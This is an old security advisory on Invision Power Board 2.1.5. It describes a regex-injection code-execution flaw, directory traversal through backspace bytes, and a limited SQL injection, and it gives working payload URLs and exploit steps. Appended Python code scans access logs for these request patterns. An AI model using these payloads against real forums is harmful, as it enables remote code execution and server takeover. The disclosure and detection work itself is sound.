Invision Vulnerabilities, including remote code execution

2006-04-27 / 2006-04-28
Credit: IceShaman
Risk: High
Local: No
Remote: Yes
CWE: N/A

Several Invision Flaws (2.1.5 and possibly earlier)
---------------------------------------------------
IceShaman & Wells
HackThisSite.org

1) Code execution

sources/action_public/search.php line 1261:

    $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );

The input string is not properly sanitized, which can lead to arbitrary code execution.

Example exploit:

- Post in a forum with "eval(die()); //" somewhere in the body of the post.
- Use the search form to find the text "die" by your username only (so only one result shows); make sure "Show results as posts" is selected.
- Append &lastdate=z|eval.*?%20//)%23e%00 to the URL at the top and press return.
- The code should have been executed.

The lastdate string alters the regex to accept anything inside eval() and parse it as code: an #e modifier is added, and then %00, which is parsed as a null byte, truncates the string and thus removes the original )#i part. Because selected='selected' would also be executed as PHP code, a space and // have to be used to turn that text into a comment so that PHP ignores it.

As you can see, this is just the beginning. You can upload an avatar with PHP code somewhere in it and change the above example to include() it, thus running as much PHP code as you like. On default PHP setups you can also include() remote files.

2) Remote file inclusion (requires admin)

sources/action_admin/paysubscriptions.php line 282:

    $gateway = trim( $this->ipsclass->input['name'] );

The input string is not properly sanitized and can be used to traverse directories in this later include on line 307:

    require_once( ROOT_PATH . 'sources/classes/paymentgateways/class_gw_'.$gateway.'.php' );

This code may look safe because the prefix to the file is hardcoded; unfortunately the backspace character may be used to remove this prefix, thus allowing ../../ combinations to execute code from any file ending in .php.

Example:

http://host/admin.php?adsess=...&section=content&act=msubs&code=install-gateway&name=%08%08%08%08%08%08%08%08%08/../class_gw_test

The above is a simple POC which installs the 'test' gateway. %08 will be parsed as the backspace character; 9 of them are required to remove 'class_gw_'. Whereas this is not a serious threat, someone with access to the system (shared server, with a /tmp directory?) who happened to gain/have access to the admin panel would be able to use this to run arbitrary code on the server in the correct circumstances.

3) SQL Injection (limited use)

sources/lib/func_taskmanager.php line 70:

    $this->cron_key = substr( trim(stripslashes($_REQUEST['ck'])), 0, 32 );

The input from 'ck' is not sanitized, which could lead to an SQL injection (limited to 32 characters) on line 113:

    'where' => "task_cronkey='".$this->cron_key."'",

Example:

http://www.host.com/index.php?act=task&ck='

Although this is limited to 32 characters, it still may pose a risk in certain circumstances.

Flaws researched by IceShaman and Wells.

Flaw #1 was first discovered by the "securicore" security group and used to exploit my forums. This led to me doing a quick audit of the code to find it (it goes without saying that I succeeded).

- IceShaman
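As an added example (not part of the advisory or the IPB code base), the following Python scans web-server access-log lines for the three request shapes the advisory describes: a null byte or a closing delimiter plus e modifier in lastdate, backspace or traversal bytes in the gateway name, and quote characters in ck. The log lines, IP addresses and session value are constructed samples; the percent-decoding is done exactly once so that %00 and %08 are inspected as the bytes PHP would see.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample access-log lines (not real traffic) mirroring the three
# request shapes from the advisory, plus one benign search request.
SAMPLE_LOG = r"""
10.0.0.5 - - [27/Apr/2006:10:01:02 +0000] "GET /index.php?act=Search&lastdate=z|eval.*?%20//)%23e%00 HTTP/1.1" 200 5120
10.0.0.6 - - [27/Apr/2006:10:02:11 +0000] "GET /admin.php?adsess=abc&section=content&act=msubs&code=install-gateway&name=%08%08%08%08%08%08%08%08%08/../class_gw_test HTTP/1.1" 200 410
10.0.0.7 - - [27/Apr/2006:10:03:40 +0000] "GET /index.php?act=task&ck=' HTTP/1.1" 200 12
10.0.0.8 - - [27/Apr/2006:10:04:00 +0000] "GET /index.php?act=Search&lastdate=week HTTP/1.1" 200 7000
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def iter_params(query):
    """Yield (name, raw_bytes); %xx is decoded once so %00 and %08 become real bytes."""
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield name, unquote_to_bytes(value)

def check_params(query):
    """Return (param, reason) findings for one IPB query string."""
    findings = []
    for name, raw in iter_params(query):
        if name == "lastdate" and (b"\x00" in raw or re.search(rb"\)#[a-z]*e", raw)):
            findings.append((name, "null byte or closing delimiter plus e modifier"))
        elif name == "name" and (b"\x08" in raw or b"../" in raw or b"..\\" in raw):
            findings.append((name, "backspace or directory traversal in gateway name"))
        elif name == "ck" and any(c in raw for c in (b"'", b'"', b"\x00")):
            findings.append((name, "quote or null byte in cron key"))
    return findings

def scan_log(text):
    """Return [(line_no, path, findings)] for every request that has a finding."""
    hits = []
    for n, line in enumerate(text.strip().splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            url = urlsplit(m.group(1))
            findings = check_params(url.query)
            if findings:
                hits.append((n, url.path, findings))
    return hits

if __name__ == "__main__":
    for n, path, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}: {path}: {findings}")
```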



Copyright 2024, cxsecurity.com
